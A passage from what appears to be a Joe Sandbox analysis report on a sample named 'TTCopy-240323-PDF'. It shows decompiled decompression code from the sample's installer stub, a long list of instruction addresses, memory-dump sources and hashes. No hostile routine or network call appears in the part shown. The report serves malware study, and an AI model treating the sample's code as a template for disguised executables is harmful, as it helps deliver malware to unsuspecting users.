									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                            0x00406bc0
                                                                                            0x00406bc7
                                                                                            0x00406bcd
                                                                                            0x00406bd3
                                                                                            0x00000000
                                                                                            0x00406bd7
                                                                                            0x00406be3
                                                                                            0x00406be3
                                                                                            0x00406be3
                                                                                            0x00406bec
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x00000000
                                                                                            0x00406bf9
                                                                                            0x00406bfd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c06
                                                                                            0x00406c09
                                                                                            0x00406c0c
                                                                                            0x00406c0e
                                                                                            0x00406c10
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c16
                                                                                            0x00406c19
                                                                                            0x00406c1b
                                                                                            0x00406c1c
                                                                                            0x00406c1f
                                                                                            0x00406c21
                                                                                            0x00406c22
                                                                                            0x00406c24
                                                                                            0x00406c27
                                                                                            0x00406c2c
                                                                                            0x00406c31
                                                                                            0x00406c3a
                                                                                            0x00406c4d
                                                                                            0x00406c50
                                                                                            0x00406c59
                                                                                            0x00406c5c
                                                                                            0x00406c84
                                                                                            0x00406c84
                                                                                            0x00406c86
                                                                                            0x00406c94
                                                                                            0x00406c94
                                                                                            0x00406c98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c88
                                                                                            0x00406c8b
                                                                                            0x00406c8b
                                                                                            0x00406c8c
                                                                                            0x00406c8c
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c5e
                                                                                            0x00406c62
                                                                                            0x00406c67
                                                                                            0x00406c67
                                                                                            0x00406c70
                                                                                            0x00406c76
                                                                                            0x00406c78
                                                                                            0x00406c7b
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c9e
                                                                                            0x00406c9e
                                                                                            0x00406ca2
                                                                                            0x0040754e
                                                                                            0x00000000
                                                                                            0x0040754e
                                                                                            0x00406cab
                                                                                            0x00406cbb
                                                                                            0x00406cbe
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc4
                                                                                            0x00406cc4
                                                                                            0x00406cc8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406cca
                                                                                            0x00406ccd
                                                                                            0x00406cd0
                                                                                            0x00406cfa
                                                                                            0x00406d00
                                                                                            0x00406d07
                                                                                            0x00000000
                                                                                            0x00406d07
                                                                                            0x00406cd2
                                                                                            0x00406cd6
                                                                                            0x00406cd9
                                                                                            0x00406cde
                                                                                            0x00406cde
                                                                                            0x00406ce9
                                                                                            0x00406cef
                                                                                            0x00406cf1
                                                                                            0x00406cf4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d39
                                                                                            0x00406d3f
                                                                                            0x00406d42
                                                                                            0x00406d4f
                                                                                            0x00406d57
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d0e
                                                                                            0x00406d0e
                                                                                            0x00406d12
                                                                                            0x0040755d
                                                                                            0x00000000
                                                                                            0x0040755d
                                                                                            0x00406d1e
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d2c
                                                                                            0x00406d2f
                                                                                            0x00406d32
                                                                                            0x00406d35
                                                                                            0x00406d37
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004073ce
                                                                                            0x004073ce
                                                                                            0x004073d4
                                                                                            0x004073da
                                                                                            0x004073dd
                                                                                            0x004073e0
                                                                                            0x004073fa
                                                                                            0x004073fd
                                                                                            0x00407403
                                                                                            0x0040740e
                                                                                            0x0040740e
                                                                                            0x00407410
                                                                                            0x004073e2
                                                                                            0x004073e2
                                                                                            0x004073f1
                                                                                            0x004073f5
                                                                                            0x004073f5
                                                                                            0x00407413
                                                                                            0x0040741a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040741c
                                                                                            0x0040741c
                                                                                            0x00407420
                                                                                            0x004075cf
                                                                                            0x00000000
                                                                                            0x004075cf
                                                                                            0x0040742c
                                                                                            0x00407433
                                                                                            0x0040743b
                                                                                            0x0040743b
                                                                                            0x0040743b
                                                                                            0x0040743e
                                                                                            0x00407441
                                                                                            0x00407441
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d5f
                                                                                            0x00406d61
                                                                                            0x00406d64
                                                                                            0x00406dd5
                                                                                            0x00406dd8
                                                                                            0x00406ddb
                                                                                            0x00406de2
                                                                                            0x00406dec
                                                                                            0x00000000
                                                                                            0x00406dec
                                                                                            0x00406d66
                                                                                            0x00406d6a
                                                                                            0x00406d6d
                                                                                            0x00406d6f
                                                                                            0x00406d72
                                                                                            0x00406d75
                                                                                            0x00406d77
                                                                                            0x00406d7a
                                                                                            0x00406d7c
                                                                                            0x00406d81
                                                                                            0x00406d84
                                                                                            0x00406d87
                                                                                            0x00406d8b
                                                                                            0x00406d92
                                                                                            0x00406d95
                                                                                            0x00406d9c
                                                                                            0x00406da0
                                                                                            0x00406da8
                                                                                            0x00406da8
                                                                                            0x00406da8
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406dac
                                                                                            0x00406daf
                                                                                            0x00406dcd
                                                                                            0x00406dcf
                                                                                            0x00000000
                                                                                            0x00406dcf
                                                                                            0x00406db1
                                                                                            0x00406db4
                                                                                            0x00406db7
                                                                                            0x00406dba
                                                                                            0x00406dbc
                                                                                            0x00406dbc
                                                                                            0x00406dbc
                                                                                            0x00406dbf
                                                                                            0x00406dc2
                                                                                            0x00406dc4
                                                                                            0x00406dc5
                                                                                            0x00406dc8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406ffe
                                                                                            0x00407002
                                                                                            0x00407020
                                                                                            0x00407023
                                                                                            0x0040702a
                                                                                            0x0040702d
                                                                                            0x00407030
                                                                                            0x00407033
                                                                                            0x00407036
                                                                                            0x00407039
                                                                                            0x0040703b
                                                                                            0x00407042
                                                                                            0x00407043
                                                                                            0x00407045
                                                                                            0x00407048
                                                                                            0x0040704b
                                                                                            0x0040704e
                                                                                            0x0040704e
                                                                                            0x00407053
                                                                                            0x00000000
                                                                                            0x00407053
                                                                                            0x00407004
                                                                                            0x00407007
                                                                                            0x0040700a
                                                                                            0x00407014
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407068
                                                                                            0x0040706c
                                                                                            0x0040708f
                                                                                            0x00407092
                                                                                            0x00407095
                                                                                            0x0040709f
                                                                                            0x0040706e
                                                                                            0x0040706e
                                                                                            0x00407071
                                                                                            0x00407074
                                                                                            0x00407077
                                                                                            0x00407084
                                                                                            0x00407087
                                                                                            0x00407087
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070ab
                                                                                            0x004070af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070b5
                                                                                            0x004070b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070bf
                                                                                            0x004070c1
                                                                                            0x004070c5
                                                                                            0x004070c5
                                                                                            0x004070c8
                                                                                            0x004070cc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040711c
                                                                                            0x00407120
                                                                                            0x00407127
                                                                                            0x0040712a
                                                                                            0x0040712d
                                                                                            0x00407137
                                                                                            0x00000000
                                                                                            0x00407137
                                                                                            0x00407122
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407143
                                                                                            0x00407147
                                                                                            0x0040714e
                                                                                            0x00407151
                                                                                            0x00407154
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407157
                                                                                            0x0040715a
                                                                                            0x0040715d
                                                                                            0x0040715d
                                                                                            0x00407160
                                                                                            0x00407163
                                                                                            0x00407166
                                                                                            0x00407166
                                                                                            0x00407169
                                                                                            0x00407170
                                                                                            0x00407175
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407203
                                                                                            0x00407203
                                                                                            0x00407207
                                                                                            0x004075a5
                                                                                            0x00000000
                                                                                            0x004075a5
                                                                                            0x0040720d
                                                                                            0x00407210
                                                                                            0x00407213
                                                                                            0x00407217
                                                                                            0x0040721a
                                                                                            0x00407220
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407225
                                                                                            0x00407228
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406df8
                                                                                            0x00406df8
                                                                                            0x00406dfc
                                                                                            0x00407569
                                                                                            0x00000000
                                                                                            0x00407569
                                                                                            0x00406e02
                                                                                            0x00406e05
                                                                                            0x00406e08
                                                                                            0x00406e0c
                                                                                            0x00406e0f
                                                                                            0x00406e15
                                                                                            0x00406e17
                                                                                            0x00406e17
                                                                                            0x00406e17
                                                                                            0x00406e1a
                                                                                            0x00406e1d
                                                                                            0x00406e1d
                                                                                            0x00406e20
                                                                                            0x00406e23
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e29
                                                                                            0x00406e2f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e35
                                                                                            0x00406e35
                                                                                            0x00406e39
                                                                                            0x00406e3c
                                                                                            0x00406e3f
                                                                                            0x00406e42
                                                                                            0x00406e45
                                                                                            0x00406e46
                                                                                            0x00406e49
                                                                                            0x00406e4b
                                                                                            0x00406e51
                                                                                            0x00406e54
                                                                                            0x00406e57
                                                                                            0x00406e5a
                                                                                            0x00406e5d
                                                                                            0x00406e60
                                                                                            0x00406e63
                                                                                            0x00406e7f
                                                                                            0x00406e82
                                                                                            0x00406e85
                                                                                            0x00406e88
                                                                                            0x00406e8f
                                                                                            0x00406e93
                                                                                            0x00406e95
                                                                                            0x00406e99
                                                                                            0x00406e65
                                                                                            0x00406e65
                                                                                            0x00406e69
                                                                                            0x00406e71
                                                                                            0x00406e76
                                                                                            0x00406e78
                                                                                            0x00406e7a
                                                                                            0x00406e7a
                                                                                            0x00406e9c
                                                                                            0x00406ea3
                                                                                            0x00406ea6
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eb1
                                                                                            0x00406eb1
                                                                                            0x00406eb5
                                                                                            0x00407575
                                                                                            0x00000000
                                                                                            0x00407575
                                                                                            0x00406ebb
                                                                                            0x00406ebe
                                                                                            0x00406ec1
                                                                                            0x00406ec5
                                                                                            0x00406ec8
                                                                                            0x00406ece
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed3
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406edc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406ede
                                                                                            0x00406ee1
                                                                                            0x00406ee4
                                                                                            0x00406ee7
                                                                                            0x00406eea
                                                                                            0x00406eed
                                                                                            0x00406ef0
                                                                                            0x00406ef3
                                                                                            0x00406ef6
                                                                                            0x00406ef9
                                                                                            0x00406efc
                                                                                            0x00406f14
                                                                                            0x00406f17
                                                                                            0x00406f1a
                                                                                            0x00406f1d
                                                                                            0x00406f1d
                                                                                            0x00406f20
                                                                                            0x00406f24
                                                                                            0x00406f26
                                                                                            0x00406efe
                                                                                            0x00406efe
                                                                                            0x00406f06
                                                                                            0x00406f0b
                                                                                            0x00406f0d
                                                                                            0x00406f0f
                                                                                            0x00406f0f
                                                                                            0x00406f29
                                                                                            0x00406f30
                                                                                            0x00406f33
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00406f33
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f75
                                                                                            0x00406f75
                                                                                            0x00406f79
                                                                                            0x00407581
                                                                                            0x00000000
                                                                                            0x00407581
                                                                                            0x00406f7f
                                                                                            0x00406f82
                                                                                            0x00406f85
                                                                                            0x00406f89
                                                                                            0x00406f8c
                                                                                            0x00406f92
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f97
                                                                                            0x00406f9a
                                                                                            0x00406f9a
                                                                                            0x00406fa0
                                                                                            0x00406f3e
                                                                                            0x00406f3e
                                                                                            0x00406f41
                                                                                            0x00000000
                                                                                            0x00406f41
                                                                                            0x00406fa2
                                                                                            0x00406fa2
                                                                                            0x00406fa5
                                                                                            0x00406fa8
                                                                                            0x00406fab
                                                                                            0x00406fae
                                                                                            0x00406fb1
                                                                                            0x00406fb4
                                                                                            0x00406fb7
                                                                                            0x00406fba
                                                                                            0x00406fbd
                                                                                            0x00406fc0
                                                                                            0x00406fd8
                                                                                            0x00406fdb
                                                                                            0x00406fde
                                                                                            0x00406fe1
                                                                                            0x00406fe1
                                                                                            0x00406fe4
                                                                                            0x00406fe8
                                                                                            0x00406fea
                                                                                            0x00406fc2
                                                                                            0x00406fc2
                                                                                            0x00406fca
                                                                                            0x00406fcf
                                                                                            0x00406fd1
                                                                                            0x00406fd3
                                                                                            0x00406fd3
                                                                                            0x00406fed
                                                                                            0x00406ff4
                                                                                            0x00406ff7
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00407286
                                                                                            0x00407286
                                                                                            0x0040728a
                                                                                            0x004075b1
                                                                                            0x00000000
                                                                                            0x004075b1
                                                                                            0x00407290
                                                                                            0x00407293
                                                                                            0x00407296
                                                                                            0x0040729a
                                                                                            0x0040729d
                                                                                            0x004072a3
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407056
                                                                                            0x00407056
                                                                                            0x00407059
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407395
                                                                                            0x00407399
                                                                                            0x004073bb
                                                                                            0x004073be
                                                                                            0x004073c8
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x0040739b
                                                                                            0x0040739e
                                                                                            0x004073a2
                                                                                            0x004073a5
                                                                                            0x004073a5
                                                                                            0x004073a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407452
                                                                                            0x00407456
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x0040747b
                                                                                            0x00407482
                                                                                            0x00407489
                                                                                            0x00407489
                                                                                            0x00000000
                                                                                            0x00407489
                                                                                            0x00407458
                                                                                            0x0040745b
                                                                                            0x0040745e
                                                                                            0x00407461
                                                                                            0x00407468
                                                                                            0x004073ac
                                                                                            0x004073ac
                                                                                            0x004073af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407543
                                                                                            0x00407546
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040717d
                                                                                            0x0040717f
                                                                                            0x00407186
                                                                                            0x00407187
                                                                                            0x00407189
                                                                                            0x0040718c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407194
                                                                                            0x00407197
                                                                                            0x0040719a
                                                                                            0x0040719c
                                                                                            0x0040719e
                                                                                            0x0040719e
                                                                                            0x0040719f
                                                                                            0x004071a2
                                                                                            0x004071a9
                                                                                            0x004071ac
                                                                                            0x004071ba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407490
                                                                                            0x00407490
                                                                                            0x00407493
                                                                                            0x0040749a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040749f
                                                                                            0x0040749f
                                                                                            0x004074a3
                                                                                            0x004075db
                                                                                            0x00000000
                                                                                            0x004075db
                                                                                            0x004074a9
                                                                                            0x004074ac
                                                                                            0x004074af
                                                                                            0x004074b3
                                                                                            0x004074b6
                                                                                            0x004074bc
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074c1
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c7
                                                                                            0x004074c7
                                                                                            0x004074cb
                                                                                            0x0040752b
                                                                                            0x0040752e
                                                                                            0x00407533
                                                                                            0x00407534
                                                                                            0x00407536
                                                                                            0x00407538
                                                                                            0x0040753b
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x00407447
                                                                                            0x004074cd
                                                                                            0x004074d3
                                                                                            0x004074d6
                                                                                            0x004074d9
                                                                                            0x004074dc
                                                                                            0x004074df
                                                                                            0x004074e2
                                                                                            0x004074e5
                                                                                            0x004074e8
                                                                                            0x004074eb
                                                                                            0x004074ee
                                                                                            0x00407507
                                                                                            0x0040750a
                                                                                            0x0040750d
                                                                                            0x00407510
                                                                                            0x00407514
                                                                                            0x00407516
                                                                                            0x00407516
                                                                                            0x00407517
                                                                                            0x0040751a
                                                                                            0x004074f0
                                                                                            0x004074f0
                                                                                            0x004074f8
                                                                                            0x004074fd
                                                                                            0x004074ff
                                                                                            0x00407502
                                                                                            0x00407502
                                                                                            0x0040751d
                                                                                            0x00407524
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x004071c2
                                                                                            0x004071c5
                                                                                            0x004071fb
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732e
                                                                                            0x0040732e
                                                                                            0x00407331
                                                                                            0x00407333
                                                                                            0x004075bd
                                                                                            0x00000000
                                                                                            0x004075bd
                                                                                            0x00407339
                                                                                            0x0040733c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407342
                                                                                            0x00407346
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00000000
                                                                                            0x00407349
                                                                                            0x004071c7
                                                                                            0x004071c9
                                                                                            0x004071cb
                                                                                            0x004071cd
                                                                                            0x004071d0
                                                                                            0x004071d1
                                                                                            0x004071d3
                                                                                            0x004071d5
                                                                                            0x004071d8
                                                                                            0x004071db
                                                                                            0x004071f1
                                                                                            0x004071f6
                                                                                            0x0040722e
                                                                                            0x0040722e
                                                                                            0x00407232
                                                                                            0x0040725e
                                                                                            0x00407260
                                                                                            0x00407267
                                                                                            0x0040726a
                                                                                            0x0040726d
                                                                                            0x0040726d
                                                                                            0x00407272
                                                                                            0x00407272
                                                                                            0x00407274
                                                                                            0x00407277
                                                                                            0x0040727e
                                                                                            0x00407281
                                                                                            0x004072ae
                                                                                            0x004072ae
                                                                                            0x004072b1
                                                                                            0x004072b4
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00000000
                                                                                            0x00407328
                                                                                            0x004072b6
                                                                                            0x004072bc
                                                                                            0x004072bf
                                                                                            0x004072c2
                                                                                            0x004072c5
                                                                                            0x004072c8
                                                                                            0x004072cb
                                                                                            0x004072ce
                                                                                            0x004072d1
                                                                                            0x004072d4
                                                                                            0x004072d7
                                                                                            0x004072f0
                                                                                            0x004072f2
                                                                                            0x004072f5
                                                                                            0x004072f6
                                                                                            0x004072f9
                                                                                            0x004072fb
                                                                                            0x004072fe
                                                                                            0x00407300
                                                                                            0x00407302
                                                                                            0x00407305
                                                                                            0x00407307
                                                                                            0x0040730a
                                                                                            0x0040730e
                                                                                            0x00407310
                                                                                            0x00407310
                                                                                            0x00407311
                                                                                            0x00407314
                                                                                            0x00407317
                                                                                            0x004072d9
                                                                                            0x004072d9
                                                                                            0x004072e1
                                                                                            0x004072e6
                                                                                            0x004072e8
                                                                                            0x004072eb
                                                                                            0x004072eb
                                                                                            0x0040731a
                                                                                            0x00407321
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00407321
                                                                                            0x00407234
                                                                                            0x00407237
                                                                                            0x00407239
                                                                                            0x0040723c
                                                                                            0x0040723f
                                                                                            0x00407242
                                                                                            0x00407244
                                                                                            0x00407247
                                                                                            0x0040724a
                                                                                            0x0040724a
                                                                                            0x0040724d
                                                                                            0x0040724d
                                                                                            0x00407250
                                                                                            0x00407257
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00407257
                                                                                            0x004071dd
                                                                                            0x004071e0
                                                                                            0x004071e2
                                                                                            0x004071e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f44
                                                                                            0x00406f44
                                                                                            0x00406f48
                                                                                            0x0040758d
                                                                                            0x00000000
                                                                                            0x0040758d
                                                                                            0x00406f4e
                                                                                            0x00406f51
                                                                                            0x00406f54
                                                                                            0x00406f57
                                                                                            0x00406f5a
                                                                                            0x00406f5d
                                                                                            0x00406f60
                                                                                            0x00406f62
                                                                                            0x00406f65
                                                                                            0x00406f68
                                                                                            0x00406f6b
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070cf
                                                                                            0x004070cf
                                                                                            0x004070d3
                                                                                            0x00407599
                                                                                            0x00000000
                                                                                            0x00407599
                                                                                            0x004070d9
                                                                                            0x004070dc
                                                                                            0x004070df
                                                                                            0x004070e2
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e7
                                                                                            0x004070ea
                                                                                            0x004070ed
                                                                                            0x004070f0
                                                                                            0x004070f3
                                                                                            0x004070f6
                                                                                            0x004070f7
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070fc
                                                                                            0x004070ff
                                                                                            0x00407102
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407108
                                                                                            0x0040710a
                                                                                            0x0040710a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x00407350
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407356
                                                                                            0x00407359
                                                                                            0x0040735c
                                                                                            0x0040735f
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407364
                                                                                            0x00407367
                                                                                            0x0040736a
                                                                                            0x0040736d
                                                                                            0x00407370
                                                                                            0x00407373
                                                                                            0x00407374
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407379
                                                                                            0x0040737c
                                                                                            0x0040737f
                                                                                            0x00407382
                                                                                            0x00407385
                                                                                            0x00407389
                                                                                            0x0040738b
                                                                                            0x0040738e
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x0040710d
                                                                                            0x0040710d
                                                                                            0x00000000
                                                                                            0x0040710d
                                                                                            0x0040738e
                                                                                            0x004075c3
                                                                                            0x004075e5
                                                                                            0x004075eb
                                                                                            0x004075ed
                                                                                            0x004075f4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: defghijklmnopqrstuvwxyz$eNotification
                                                                                            • API String ID: 0-2877872591
                                                                                            • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                            • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                            • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                            • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403479 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
